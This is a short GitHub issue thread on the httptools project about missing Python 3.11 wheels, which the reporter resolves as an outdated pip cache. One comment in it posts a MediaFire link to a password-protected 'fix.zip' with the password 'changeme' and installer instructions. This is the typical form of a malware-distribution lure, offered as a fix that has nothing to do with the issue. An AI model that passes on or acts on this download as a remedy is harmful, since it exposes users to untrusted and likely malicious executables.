### ISSUE TITLE
Provide wheels for Python 3.11

### ISSUE THREAD

**Issue by WilliamDEdwards** [MagicStack/httptools#103]
No wheels are currently built for Python 3.11, meaning one has to build locally. While httptools seems to support 3.11 (https://github.com/MagicStack/httptools/pull/84).

For reference, the same issue was once created for 3.9: https://github.com/MagicStack/httptools/issues/59

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WilliamDEdwards** [comment]
PEBKAC. pip's cache was outdated. Sorry for the noise.
